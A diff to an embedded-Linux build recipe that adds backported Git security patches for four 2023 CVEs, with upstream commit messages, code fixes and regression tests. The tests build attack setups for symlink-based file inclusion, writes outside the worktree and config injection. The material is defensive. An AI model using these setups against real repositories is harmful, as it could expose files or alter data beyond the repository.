154+ ln -s "../../../.git/modules/sub/../../../repo/" "$URI" &&
155+
156+ git add . &&
157+ git commit -m "initial commit"
158+ ) &&
159+
160+ # Delete all of the references in our malicious submodule to
161+ # avoid the client attempting to checkout any objects (which
162+ # will be missing, and thus will cause the clone to fail before
163+ # we can trigger the exploit).
164+ git -C "$REPO" for-each-ref --format="delete %(refname)" >in &&
165+ git -C "$REPO" update-ref --stdin <in &&
166+ git -C "$REPO" update-server-info
167+'
168+
169+test_expect_failure 'ambiguous transport does not lead to arbitrary file-inclusion' '
170+ git clone malicious clone &&
171+ git -C clone submodule update --init &&
172+
173+ test_path_is_missing clone/.git/modules/sub/objects/secret
174+'
175+
176+test_done
177--
1782.25.1
179
diff --git a/meta/recipes-devtools/git/files/CVE-2023-22490-2.patch b/meta/recipes-devtools/git/files/CVE-2023-22490-2.patch
new file mode 100644
index 0000000000..0b5b40f827
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-22490-2.patch
@@ -0,0 +1,122 @@
1From cf8f6ce02a13f4d1979a53241afbee15a293fce9 Mon Sep 17 00:00:00 2001
2From: Taylor Blau <me@ttaylorr.com>
3Date: Tue, 24 Jan 2023 19:43:48 -0500
4Subject: [PATCH 2/3] clone: delay picking a transport until after get_repo_path()
5
6In the previous commit, t5619 demonstrates an issue where two calls to
7`get_repo_path()` could trick Git into using its local clone mechanism
8in conjunction with a non-local transport.
9
10That sequence is:
11
12 - the starting state is that the local path https:/example.com/foo is a
13 symlink that points to ../../../.git/modules/foo. So it's dangling.
14
15 - get_repo_path() sees that no such path exists (because it's
16 dangling), and thus we do not canonicalize it into an absolute path
17
18 - because we're using --separate-git-dir, we create .git/modules/foo.
19 Now our symlink is no longer dangling!
20
21 - we pass the url to transport_get(), which sees it as an https URL.
22
23 - we call get_repo_path() again, on the url. This second call was
24 introduced by f38aa83 (use local cloning if insteadOf makes a
25 local URL, 2014-07-17). The idea is that we want to pull the url
26 fresh from the remote.c API, because it will apply any aliases.
27
28And of course now it sees that there is a local file, which is a
29mismatch with the transport we already selected.
30
31The issue in the above sequence is calling `transport_get()` before
32deciding whether or not the repository is indeed local, and not passing
33in an absolute path if it is local.
34
35This is reminiscent of a similar bug report in [1], where it was
36suggested to perform the `insteadOf` lookup earlier. Taking that
37approach may not be as straightforward, since the intent is to store the
38original URL in the config, but to actually fetch from the insteadOf
39one, so conflating the two early on is a non-starter.
40
41Note: we pass the path returned by `get_repo_path(remote->url[0])`,
42which should be the same as `repo_name` (aside from any `insteadOf`
43rewrites).
44
45We *could* pass `absolute_pathdup()` of the same argument, which
4686521ac (Bring local clone's origin URL in line with that of a remote
47clone, 2008-09-01) indicates may differ depending on the presence of
48".git/" for a non-bare repo. That matters for forming relative submodule
49paths, but doesn't matter for the second call, since we're just feeding
50it to the transport code, which is fine either way.
51
52[1]: https://lore.kernel.org/git/CAMoD=Bi41mB3QRn3JdZL-FGHs4w3C2jGpnJB-CqSndO7FMtfzA@mail.gmail.com/
53
54Signed-off-by: Jeff King <peff@peff.net>
55Signed-off-by: Taylor Blau <me@ttaylorr.com>
56Signed-off-by: Junio C Hamano <gitster@pobox.com>
57
58Upstream-Status: Backport
59[https://github.com/git/git/commit/cf8f6ce02a13f4d1979a53241afbee15a293fce9]
60CVE: CVE-2023-22490
61Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
62---
63 builtin/clone.c | 8 ++++----
64 t/t5619-clone-local-ambiguous-transport.sh | 15 +++++++++++----
65 2 files changed, 15 insertions(+), 8 deletions(-)
66
67diff --git a/builtin/clone.c b/builtin/clone.c
68index 53e04b1..b57e703 100644
69--- a/builtin/clone.c
70+++ b/builtin/clone.c
71@@ -1112,10 +1112,6 @@ int cmd_clone(int argc, const char **argv, const char *prefix)
72 branch_top.buf);
73 refspec_append(&remote->fetch, default_refspec.buf);
74
75- transport = transport_get(remote, remote->url[0]);
76- transport_set_verbosity(transport, option_verbosity, option_progress);
77- transport->family = family;
78-
79 path = get_repo_path(remote->url[0], &is_bundle);
80 is_local = option_local != 0 && path && !is_bundle;
81 if (is_local) {
82@@ -1135,6 +1131,10 @@ int cmd_clone(int argc, const char **argv, const char *prefix)
83 }
84 if (option_local > 0 && !is_local)
85 warning(_("--local is ignored"));
86+
87+ transport = transport_get(remote, path ? path : remote->url[0]);
88+ transport_set_verbosity(transport, option_verbosity, option_progress);
89+ transport->family = family;
90 transport->cloning = 1;
91
92 transport_set_option(transport, TRANS_OPT_KEEP, "yes");
93diff --git a/t/t5619-clone-local-ambiguous-transport.sh b/t/t5619-clone-local-ambiguous-transport.sh
94index 7ebd31a..cce62bf 100644
95--- a/t/t5619-clone-local-ambiguous-transport.sh
96+++ b/t/t5619-clone-local-ambiguous-transport.sh
97@@ -53,11 +53,18 @@ test_expect_success 'setup' '
98 git -C "$REPO" update-server-info
99 '
100
101-test_expect_failure 'ambiguous transport does not lead to arbitrary file-inclusion' '
102+test_expect_success 'ambiguous transport does not lead to arbitrary file-inclusion' '
103 git clone malicious clone &&
104- git -C clone submodule update --init &&
105-
106- test_path_is_missing clone/.git/modules/sub/objects/secret
107+ test_must_fail git -C clone submodule update --init 2>err &&
108+
109+ test_path_is_missing clone/.git/modules/sub/objects/secret &&
110+ # We would actually expect "transport .file. not allowed" here,
111+ # but due to quirks of the URL detection in Git, we mis-parse
112+ # the absolute path as a bogus URL and die before that step.
113+ #
114+ # This works for now, and if we ever fix the URL detection, it
115+ # is OK to change this to detect the transport error.
116+ grep "protocol .* is not supported" err
117 '
118
119 test_done
120--
1212.25.1
122
diff --git a/meta/recipes-devtools/git/files/CVE-2023-22490-3.patch b/meta/recipes-devtools/git/files/CVE-2023-22490-3.patch
new file mode 100644
index 0000000000..08fb7f840b
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-22490-3.patch
@@ -0,0 +1,154 @@
1From bffc762f87ae8d18c6001bf0044a76004245754c Mon Sep 17 00:00:00 2001
2From: Taylor Blau <me@ttaylorr.com>
3Date: Tue, 24 Jan 2023 19:43:51 -0500
4Subject: [PATCH 3/3] dir-iterator: prevent top-level symlinks without FOLLOW_SYMLINKS
5
6When using the dir_iterator API, we first stat(2) the base path, and
7then use that as a starting point to enumerate the directory's contents.
8
9If the directory contains symbolic links, we will immediately die() upon
10encountering them without the `FOLLOW_SYMLINKS` flag. The same is not
11true when resolving the top-level directory, though.
12
13As explained in a previous commit, this oversight in 6f054f9
14(builtin/clone.c: disallow `--local` clones with symlinks, 2022-07-28)
15can be used as an attack vector to include arbitrary files on a victim's
16filesystem from outside of the repository.
17
18Prevent resolving top-level symlinks unless the FOLLOW_SYMLINKS flag is
19given, which will cause clones of a repository with a symlink'd
20"$GIT_DIR/objects" directory to fail.
21
22Signed-off-by: Taylor Blau <me@ttaylorr.com>
23Signed-off-by: Junio C Hamano <gitster@pobox.com>
24
25Upstream-Status: Backport
26[https://github.com/git/git/commit/bffc762f87ae8d18c6001bf0044a76004245754c]
27CVE: CVE-2023-22490
28Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
29---
30 dir-iterator.c | 13 +++++++++----
31 dir-iterator.h | 5 +++++
32 t/t0066-dir-iterator.sh | 27 ++++++++++++++++++++++++++-
33 t/t5604-clone-reference.sh | 16 ++++++++++++++++
34 4 files changed, 56 insertions(+), 5 deletions(-)
35
36diff --git a/dir-iterator.c b/dir-iterator.c
37index b17e9f9..3764dd8 100644
38--- a/dir-iterator.c
39+++ b/dir-iterator.c
40@@ -203,7 +203,7 @@ struct dir_iterator *dir_iterator_begin(const char *path, unsigned int flags)
41 {
42 struct dir_iterator_int *iter = xcalloc(1, sizeof(*iter));
43 struct dir_iterator *dir_iterator = &iter->base;
44- int saved_errno;
45+ int saved_errno, err;
46
47 strbuf_init(&iter->base.path, PATH_MAX);
48 strbuf_addstr(&iter->base.path, path);
49@@ -213,10 +213,15 @@ struct dir_iterator *dir_iterator_begin(const char *path, unsigned int flags)
50 iter->flags = flags;
51
52 /*
53- * Note: stat already checks for NULL or empty strings and
54- * inexistent paths.
55+ * Note: stat/lstat already checks for NULL or empty strings and
56+ * nonexistent paths.
57 */
58- if (stat(iter->base.path.buf, &iter->base.st) < 0) {
59+ if (iter->flags & DIR_ITERATOR_FOLLOW_SYMLINKS)
60+ err = stat(iter->base.path.buf, &iter->base.st);
61+ else
62+ err = lstat(iter->base.path.buf, &iter->base.st);
63+
64+ if (err < 0) {
65 saved_errno = errno;
66 goto error_out;
67 }
68diff --git a/dir-iterator.h b/dir-iterator.h
69index 0822915..e3b6ff2 100644
70--- a/dir-iterator.h
71+++ b/dir-iterator.h
72@@ -61,6 +61,11 @@
73 * not the symlinks themselves, which is the default behavior. Broken
74 * symlinks are ignored.
75 *
76+ * Note: setting DIR_ITERATOR_FOLLOW_SYMLINKS affects resolving the
77+ * starting path as well (e.g., attempting to iterate starting at a
78+ * symbolic link pointing to a directory without FOLLOW_SYMLINKS will
79+ * result in an error).
80+ *
81 * Warning: circular symlinks are also followed when
82 * DIR_ITERATOR_FOLLOW_SYMLINKS is set. The iteration may end up with
83 * an ELOOP if they happen and DIR_ITERATOR_PEDANTIC is set.
84diff --git a/t/t0066-dir-iterator.sh b/t/t0066-dir-iterator.sh
85index 92910e4..c826f60 100755
86--- a/t/t0066-dir-iterator.sh
87+++ b/t/t0066-dir-iterator.sh
88@@ -109,7 +109,9 @@ test_expect_success SYMLINKS 'setup dirs with symlinks' '
89 mkdir -p dir5/a/c &&
90 ln -s ../c dir5/a/b/d &&
91 ln -s ../ dir5/a/b/e &&
92- ln -s ../../ dir5/a/b/f
93+ ln -s ../../ dir5/a/b/f &&
94+
95+ ln -s dir4 dir6
96 '
97
98 test_expect_success SYMLINKS 'dir-iterator should not follow symlinks by default' '
99@@ -145,4 +147,27 @@ test_expect_success SYMLINKS 'dir-iterator should follow symlinks w/ follow flag
100 test_cmp expected-follow-sorted-output actual-follow-sorted-output
101 '
102
103+test_expect_success SYMLINKS 'dir-iterator does not resolve top-level symlinks' '
104+ test_must_fail test-tool dir-iterator ./dir6 >out &&
105+
106+ grep "ENOTDIR" out
107+'
108+
109+test_expect_success SYMLINKS 'dir-iterator resolves top-level symlinks w/ follow flag' '
110+ cat >expected-follow-sorted-output <<-EOF &&
111+ [d] (a) [a] ./dir6/a
112+ [d] (a/f) [f] ./dir6/a/f
113+ [d] (a/f/c) [c] ./dir6/a/f/c
114+ [d] (b) [b] ./dir6/b
115+ [d] (b/c) [c] ./dir6/b/c
116+ [f] (a/d) [d] ./dir6/a/d
117+ [f] (a/e) [e] ./dir6/a/e
118+ EOF
119+
120+ test-tool dir-iterator --follow-symlinks ./dir6 >out &&
121+ sort out >actual-follow-sorted-output &&
122+
123+ test_cmp expected-follow-sorted-output actual-follow-sorted-output
124+'
125+
126 test_done
127diff --git a/t/t5604-clone-reference.sh b/t/t5604-clone-reference.sh
128index 4894237..615b981 100755
129--- a/t/t5604-clone-reference.sh
130+++ b/t/t5604-clone-reference.sh
131@@ -354,4 +354,20 @@ test_expect_success SYMLINKS 'clone repo with symlinked or unknown files at obje
132 test_must_be_empty T--shared.objects-symlinks.raw
133 '
134
135+test_expect_success SYMLINKS 'clone repo with symlinked objects directory' '
136+ test_when_finished "rm -fr sensitive malicious" &&
137+
138+ mkdir -p sensitive &&
139+ echo "secret" >sensitive/file &&
140+
141+ git init malicious &&
142+ rm -fr malicious/.git/objects &&
143+ ln -s "$(pwd)/sensitive" ./malicious/.git/objects &&
144+
145+ test_must_fail git clone --local malicious clone 2>err &&
146+
147+ test_path_is_missing clone &&
148+ grep "failed to start iterator over" err
149+'
150+
151 test_done
152--
1532.25.1
154
diff --git a/meta/recipes-devtools/git/files/CVE-2023-23946.patch b/meta/recipes-devtools/git/files/CVE-2023-23946.patch
new file mode 100644
index 0000000000..3629ff57b2
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-23946.patch
@@ -0,0 +1,184 @@
1From fade728df1221598f42d391cf377e9e84a32053f Mon Sep 17 00:00:00 2001
2From: Patrick Steinhardt <ps@pks.im>
3Date: Thu, 2 Feb 2023 11:54:34 +0100
4Subject: [PATCH] apply: fix writing behind newly created symbolic links
5
6When writing files git-apply(1) initially makes sure that none of the
7files it is about to create are behind a symlink:
8
9```
10 $ git init repo
11 Initialized empty Git repository in /tmp/repo/.git/
12 $ cd repo/
13 $ ln -s dir symlink
14 $ git apply - <<EOF
15 diff --git a/symlink/file b/symlink/file
16 new file mode 100644
17 index 0000000..e69de29
18 EOF
19 error: affected file 'symlink/file' is beyond a symbolic link
20```
21
22This safety mechanism is crucial to ensure that we don't write outside
23of the repository's working directory. It can be fooled though when the
24patch that is being applied creates the symbolic link in the first
25place, which can lead to writing files in arbitrary locations.
26
27Fix this by checking whether the path we're about to create is
28beyond a symlink or not. Tightening these checks like this should be
29fine as we already have these precautions in Git as explained
30above. Ideally, we should update the check we do up-front before
31starting to reflect the computed changes to the working tree so that
32we catch this case as well, but as part of embargoed security work,
33adding an equivalent check just before we try to write out a file
34should serve us well as a reasonable first step.
35
36Digging back into history shows that this vulnerability has existed
37since at least Git v2.9.0. As Git v2.8.0 and older don't build on my
38system anymore I cannot tell whether older versions are affected, as
39well.
40
41Reported-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
42Signed-off-by: Patrick Steinhardt <ps@pks.im>
43Signed-off-by: Junio C Hamano <gitster@pobox.com>
44
45Upstream-Status: Backport
46[https://github.com/git/git/commit/fade728df1221598f42d391cf377e9e84a32053f]
47CVE: CVE-2023-23946
48Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
49---
50 apply.c | 27 ++++++++++++++
51 t/t4115-apply-symlink.sh | 81 ++++++++++++++++++++++++++++++++++++++++
52 2 files changed, 108 insertions(+)
53
54diff --git a/apply.c b/apply.c
55index f8a046a..4f303bf 100644
56--- a/apply.c
57+++ b/apply.c
58@@ -4373,6 +4373,33 @@ static int create_one_file(struct apply_state *state,
59 if (state->cached)
60 return 0;
61
62+ /*
63+ * We already try to detect whether files are beyond a symlink in our
64+ * up-front checks. But in the case where symlinks are created by any
65+ * of the intermediate hunks it can happen that our up-front checks
66+ * didn't yet see the symlink, but at the point of arriving here there
67+ * in fact is one. We thus repeat the check for symlinks here.
68+ *
69+ * Note that this does not make the up-front check obsolete as the
70+ * failure mode is different:
71+ *
72+ * - The up-front checks cause us to abort before we have written
73+ * anything into the working directory. So when we exit this way the
74+ * working directory remains clean.
75+ *
76+ * - The checks here happen in the middle of the action where we have
77+ * already started to apply the patch. The end result will be a dirty
78+ * working directory.
79+ *
80+ * Ideally, we should update the up-front checks to catch what would
81+ * happen when we apply the patch before we damage the working tree.
82+ * We have all the information necessary to do so. But for now, as a
83+ * part of embargoed security work, having this check would serve as a
84+ * reasonable first step.
85+ */
86+ if (path_is_beyond_symlink(state, path))
87+ return error(_("affected file '%s' is beyond a symbolic link"), path);
88+
89 res = try_create_file(state, path, mode, buf, size);
90 if (res < 0)
91 return -1;
92diff --git a/t/t4115-apply-symlink.sh b/t/t4115-apply-symlink.sh
93index 872fcda..1acb7b2 100755
94--- a/t/t4115-apply-symlink.sh
95+++ b/t/t4115-apply-symlink.sh
96@@ -44,4 +44,85 @@ test_expect_success 'apply --index symlink patch' '
97
98 '
99
100+test_expect_success 'symlink setup' '
101+ ln -s .git symlink &&
102+ git add symlink &&
103+ git commit -m "add symlink"
104+'
105+
106+test_expect_success SYMLINKS 'symlink escape when creating new files' '
107+ test_when_finished "git reset --hard && git clean -dfx" &&
108+
109+ cat >patch <<-EOF &&
110+ diff --git a/symlink b/renamed-symlink
111+ similarity index 100%
112+ rename from symlink
113+ rename to renamed-symlink
114+ --
115+ diff --git /dev/null b/renamed-symlink/create-me
116+ new file mode 100644
117+ index 0000000..039727e
118+ --- /dev/null
119+ +++ b/renamed-symlink/create-me
120+ @@ -0,0 +1,1 @@
121+ +busted
122+ EOF
123+
124+ test_must_fail git apply patch 2>stderr &&
125+ cat >expected_stderr <<-EOF &&
126+ error: affected file ${SQ}renamed-symlink/create-me${SQ} is beyond a symbolic link
127+ EOF
128+ test_cmp expected_stderr stderr &&
129+ ! test_path_exists .git/create-me
130+'
131+
132+test_expect_success SYMLINKS 'symlink escape when modifying file' '
133+ test_when_finished "git reset --hard && git clean -dfx" &&
134+ touch .git/modify-me &&
135+
136+ cat >patch <<-EOF &&
137+ diff --git a/symlink b/renamed-symlink
138+ similarity index 100%
139+ rename from symlink
140+ rename to renamed-symlink
141+ --
142+ diff --git a/renamed-symlink/modify-me b/renamed-symlink/modify-me
143+ index 1111111..2222222 100644
144+ --- a/renamed-symlink/modify-me
145+ +++ b/renamed-symlink/modify-me
146+ @@ -0,0 +1,1 @@
147+ +busted
148+ EOF
149+
150+ test_must_fail git apply patch 2>stderr &&
151+ cat >expected_stderr <<-EOF &&
152+ error: renamed-symlink/modify-me: No such file or directory
153+ EOF
154+ test_cmp expected_stderr stderr &&
155+ test_must_be_empty .git/modify-me
156+'
157+
158+test_expect_success SYMLINKS 'symlink escape when deleting file' '
159+ test_when_finished "git reset --hard && git clean -dfx && rm .git/delete-me" &&
160+ touch .git/delete-me &&
161+
162+ cat >patch <<-EOF &&
163+ diff --git a/symlink b/renamed-symlink
164+ similarity index 100%
165+ rename from symlink
166+ rename to renamed-symlink
167+ --
168+ diff --git a/renamed-symlink/delete-me b/renamed-symlink/delete-me
169+ deleted file mode 100644
170+ index 1111111..0000000 100644
171+ EOF
172+
173+ test_must_fail git apply patch 2>stderr &&
174+ cat >expected_stderr <<-EOF &&
175+ error: renamed-symlink/delete-me: No such file or directory
176+ EOF
177+ test_cmp expected_stderr stderr &&
178+ test_path_is_file .git/delete-me
179+'
180+
181 test_done
182--
1832.25.1
184
diff --git a/meta/recipes-devtools/git/files/CVE-2023-25652.patch b/meta/recipes-devtools/git/files/CVE-2023-25652.patch
new file mode 100644
index 0000000000..d6b17a2b8a
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-25652.patch
@@ -0,0 +1,94 @@
1From 9db05711c98efc14f414d4c87135a34c13586e0b Mon Sep 17 00:00:00 2001
2From: Johannes Schindelin <johannes.schindelin@gmx.de>
3Date: Thu, 9 Mar 2023 16:02:54 +0100
4Subject: [PATCH] apply --reject: overwrite existing `.rej` symlink if it
5 exists
6
7The `git apply --reject` is expected to write out `.rej` files in case
8one or more hunks fail to apply cleanly. Historically, the command
9overwrites any existing `.rej` files. The idea being that
10apply/reject/edit cycles are relatively common, and the generated `.rej`
11files are not considered precious.
12
13But the command does not overwrite existing `.rej` symbolic links, and
14instead follows them. This is unsafe because the same patch could
15potentially create such a symbolic link and point at arbitrary paths
16outside the current worktree, and `git apply` would write the contents
17of the `.rej` file into that location.
18
19Therefore, let's make sure that any existing `.rej` file or symbolic
20link is removed before writing it.
21
22Reported-by: RyotaK <ryotak.mail@gmail.com>
23Helped-by: Taylor Blau <me@ttaylorr.com>
24Helped-by: Junio C Hamano <gitster@pobox.com>
25Helped-by: Linus Torvalds <torvalds@linuxfoundation.org>
26Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
27
28Upstream-Status: Backport [https://github.com/git/git/commit/9db05711c98efc14f414d4c87135a34c13586e0b]
29CVE: CVE-2023-25652
30Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
31---
32 apply.c | 14 ++++++++++++--
33 t/t4115-apply-symlink.sh | 15 +++++++++++++++
34 2 files changed, 27 insertions(+), 2 deletions(-)
35
36diff --git a/apply.c b/apply.c
37index 4f303bf..aa7111d 100644
38--- a/apply.c
39+++ b/apply.c
40@@ -4531,7 +4531,7 @@ static int write_out_one_reject(struct apply_state *state, struct patch *patch)
41 FILE *rej;
42 char namebuf[PATH_MAX];
43 struct fragment *frag;
44- int cnt = 0;
45+ int fd, cnt = 0;
46 struct strbuf sb = STRBUF_INIT;
47
48 for (cnt = 0, frag = patch->fragments; frag; frag = frag->next) {
49@@ -4571,7 +4571,17 @@ static int write_out_one_reject(struct apply_state *state, struct patch *patch)
50 memcpy(namebuf, patch->new_name, cnt);
51 memcpy(namebuf + cnt, ".rej", 5);
52
53- rej = fopen(namebuf, "w");
54+ fd = open(namebuf, O_CREAT | O_EXCL | O_WRONLY, 0666);
55+ if (fd < 0) {
56+ if (errno != EEXIST)
57+ return error_errno(_("cannot open %s"), namebuf);
58+ if (unlink(namebuf))
59+ return error_errno(_("cannot unlink '%s'"), namebuf);
60+ fd = open(namebuf, O_CREAT | O_EXCL | O_WRONLY, 0666);
61+ if (fd < 0)
62+ return error_errno(_("cannot open %s"), namebuf);
63+ }
64+ rej = fdopen(fd, "w");
65 if (!rej)
66 return error_errno(_("cannot open %s"), namebuf);
67
68diff --git a/t/t4115-apply-symlink.sh b/t/t4115-apply-symlink.sh
69index 1acb7b2..2b034ff 100755
70--- a/t/t4115-apply-symlink.sh
71+++ b/t/t4115-apply-symlink.sh
72@@ -125,4 +125,19 @@ test_expect_success SYMLINKS 'symlink escape when deleting file' '
73 test_path_is_file .git/delete-me
74 '
75
76+test_expect_success SYMLINKS '--reject removes .rej symlink if it exists' '
77+ test_when_finished "git reset --hard && git clean -dfx" &&
78+
79+ test_commit file &&
80+ echo modified >file.t &&
81+ git diff -- file.t >patch &&
82+ echo modified-again >file.t &&
83+
84+ ln -s foo file.t.rej &&
85+ test_must_fail git apply patch --reject 2>err &&
86+ test_i18ngrep "Rejected hunk" err &&
87+ test_path_is_missing foo &&
88+ test_path_is_file file.t.rej
89+'
90+
91 test_done
92--
932.25.1
94
diff --git a/meta/recipes-devtools/git/files/CVE-2023-29007.patch b/meta/recipes-devtools/git/files/CVE-2023-29007.patch
new file mode 100644
index 0000000000..e166c01412
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-29007.patch
@@ -0,0 +1,159 @@
1From 057c07a7b1fae22fdeef26c243f4cfbe3afc90ce Mon Sep 17 00:00:00 2001
2From: Taylor Blau <me@ttaylorr.com>
3Date: Fri, 14 Apr 2023 11:46:59 -0400
4Subject: [PATCH] Merge branch 'tb/config-copy-or-rename-in-file-injection'
5
6Avoids issues with renaming or deleting sections with long lines, where
7configuration values may be interpreted as sections, leading to
8configuration injection. Addresses CVE-2023-29007.
9
10* tb/config-copy-or-rename-in-file-injection:
11 config.c: disallow overly-long lines in `copy_or_rename_section_in_file()`
12 config.c: avoid integer truncation in `copy_or_rename_section_in_file()`
13 config: avoid fixed-sized buffer when renaming/deleting a section
14 t1300: demonstrate failure when renaming sections with long lines
15
16Signed-off-by: Taylor Blau <me@ttaylorr.com>
17
18Upstream-Status: Backport [https://github.com/git/git/commit/528290f8c61222433a8cf02fb7cfffa8438432b4]
19CVE: CVE-2023-29007
20Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
21---
22 config.c | 36 +++++++++++++++++++++++++-----------
23 t/t1300-config.sh | 30 ++++++++++++++++++++++++++++++
24 2 files changed, 55 insertions(+), 11 deletions(-)
25
26diff --git a/config.c b/config.c
27index e7052b3..676b687 100644
28--- a/config.c
29+++ b/config.c
30@@ -2987,9 +2987,10 @@ void git_config_set_multivar(const char *key, const char *value,
31 multi_replace);
32 }
33
34-static int section_name_match (const char *buf, const char *name)
35+static size_t section_name_match (const char *buf, const char *name)
36 {
37- int i = 0, j = 0, dot = 0;
38+ size_t i = 0, j = 0;
39+ int dot = 0;
40 if (buf[i] != '[')
41 return 0;
42 for (i = 1; buf[i] && buf[i] != ']'; i++) {
43@@ -3042,6 +3043,8 @@ static int section_name_is_ok(const char *name)
44 return 1;
45 }
46
47+#define GIT_CONFIG_MAX_LINE_LEN (512 * 1024)
48+
49 /* if new_name == NULL, the section is removed instead */
50 static int git_config_copy_or_rename_section_in_file(const char *config_filename,
51 const char *old_name,
52@@ -3051,11 +3054,12 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
53 char *filename_buf = NULL;
54 struct lock_file lock = LOCK_INIT;
55 int out_fd;
56- char buf[1024];
57+ struct strbuf buf = STRBUF_INIT;
58 FILE *config_file = NULL;
59 struct stat st;
60 struct strbuf copystr = STRBUF_INIT;
61 struct config_store_data store;
62+ uint32_t line_nr = 0;
63
64 memset(&store, 0, sizeof(store));
65
66@@ -3092,16 +3096,25 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
67 goto out;
68 }
69
70- while (fgets(buf, sizeof(buf), config_file)) {
71- int i;
72- int length;
73+ while (!strbuf_getwholeline(&buf, config_file, '\n')) {
74+ size_t i, length;
75 int is_section = 0;
76- char *output = buf;
77- for (i = 0; buf[i] && isspace(buf[i]); i++)
78+ char *output = buf.buf;
79+
80+ line_nr++;
81+
82+ if (buf.len >= GIT_CONFIG_MAX_LINE_LEN) {
83+ ret = error(_("refusing to work with overly long line "
84+ "in '%s' on line %"PRIuMAX),
85+ config_filename, (uintmax_t)line_nr);
86+ goto out;
87+ }
88+
89+ for (i = 0; buf.buf[i] && isspace(buf.buf[i]); i++)
90 ; /* do nothing */
91- if (buf[i] == '[') {
92+ if (buf.buf[i] == '[') {
93 /* it's a section */
94- int offset;
95+ size_t offset;
96 is_section = 1;
97
98 /*
99@@ -3118,7 +3131,7 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
100 strbuf_reset(&copystr);
101 }
102
103- offset = section_name_match(&buf[i], old_name);
104+ offset = section_name_match(&buf.buf[i], old_name);
105 if (offset > 0) {
106 ret++;
107 if (new_name == NULL) {
108@@ -3193,6 +3206,7 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
109 out_no_rollback:
110 free(filename_buf);
111 config_store_data_clear(&store);
112+ strbuf_release(&buf);
113 return ret;
114 }
115
116diff --git a/t/t1300-config.sh b/t/t1300-config.sh
117index 983a0a1..9b67f6b 100755
118--- a/t/t1300-config.sh
119+++ b/t/t1300-config.sh
120@@ -616,6 +616,36 @@ test_expect_success 'renaming to bogus section is rejected' '
121 test_must_fail git config --rename-section branch.zwei "bogus name"
122 '
123
124+test_expect_success 'renaming a section with a long line' '
125+ {
126+ printf "[b]\\n" &&
127+ printf " c = d %1024s [a] e = f\\n" " " &&
128+ printf "[a] g = h\\n"
129+ } >y &&
130+ git config -f y --rename-section a xyz &&
131+ test_must_fail git config -f y b.e
132+'
133+
134+test_expect_success 'renaming an embedded section with a long line' '
135+ {
136+ printf "[b]\\n" &&
137+ printf " c = d %1024s [a] [foo] e = f\\n" " " &&
138+ printf "[a] g = h\\n"
139+ } >y &&
140+ git config -f y --rename-section a xyz &&
141+ test_must_fail git config -f y foo.e
142+'
143+
144+test_expect_success 'renaming a section with an overly-long line' '
145+ {
146+ printf "[b]\\n" &&
147+ printf " c = d %525000s e" " " &&
148+ printf "[a] g = h\\n"
149+ } >y &&
150+ test_must_fail git config -f y --rename-section a xyz 2>err &&
151+ test_i18ngrep "refusing to work with overly long line in .y. on line 2" err
152+'
153+
154 cat >> .git/config << EOF
155 [branch "zwei"] a = 1 [branch "vier"]
156 EOF
157--
1582.25.1
159
diff --git a/meta/recipes-devtools/git/git.inc b/meta/recipes-devtools/git/git.inc
index 4131c98977..e64472ea28 100644
--- a/meta/recipes-devtools/git/git.inc
+++ b/meta/recipes-devtools/git/git.inc
@@ -1,5 +1,6 @@
1SUMMARY = "Distributed version control system" 1SUMMARY = "Distributed version control system"
2HOMEPAGE = "http://git-scm.com" 2HOMEPAGE = "http://git-scm.com"
3DESCRIPTION = "Git is a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency."
3SECTION = "console/utils" 4SECTION = "console/utils"
4LICENSE = "GPLv2" 5LICENSE = "GPLv2"
5DEPENDS = "openssl curl zlib expat" 6DEPENDS = "openssl curl zlib expat"
@@ -7,14 +8,44 @@ DEPENDS = "openssl curl zlib expat"
7PROVIDES_append_class-native = " git-replacement-native" 8PROVIDES_append_class-native = " git-replacement-native"
8 9
9SRC_URI = "${KERNELORG_MIRROR}/software/scm/git/git-${PV}.tar.gz;name=tarball \ 10SRC_URI = "${KERNELORG_MIRROR}/software/scm/git/git-${PV}.tar.gz;name=tarball \
10 ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages" 11 ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages \
11 12 file://fixsort.patch \
13 file://CVE-2021-40330.patch \
14 file://CVE-2022-23521.patch \
15 file://CVE-2022-41903-01.patch \
16 file://CVE-2022-41903-02.patch \
17 file://CVE-2022-41903-03.patch \
18 file://CVE-2022-41903-04.patch \
19 file://CVE-2022-41903-05.patch \
20 file://CVE-2022-41903-06.patch \
21 file://CVE-2022-41903-07.patch \
22 file://CVE-2022-41903-08.patch \
23 file://CVE-2022-41903-09.patch \
24 file://CVE-2022-41903-10.patch \
25 file://CVE-2022-41903-11.patch \
26 file://CVE-2022-41903-12.patch \
27 file://CVE-2023-22490-1.patch \
28 file://CVE-2023-22490-2.patch \
29 file://CVE-2023-22490-3.patch \
30 file://CVE-2023-23946.patch \
31 file://CVE-2023-29007.patch \
32 file://CVE-2023-25652.patch \
33 "
12S = "${WORKDIR}/git-${PV}" 34S = "${WORKDIR}/git-${PV}"
13 35
14LIC_FILES_CHKSUM = "file://COPYING;md5=7c0d7ef03a7eb04ce795b0f60e68e7e1" 36LIC_FILES_CHKSUM = "file://COPYING;md5=7c0d7ef03a7eb04ce795b0f60e68e7e1"
15 37
16CVE_PRODUCT = "git-scm:git" 38CVE_PRODUCT = "git-scm:git"
17 39
40# This is about a manpage not mentioning --mirror may "leak" information
41# in mirrored git repos. Most OE users wouldn't build the docs and
42# we don't see this as a major issue for our general users/usecases.
43CVE_CHECK_WHITELIST += "CVE-2022-24975"
44# This is specific to Git-for-Windows
45CVE_CHECK_WHITELIST += "CVE-2022-41953"
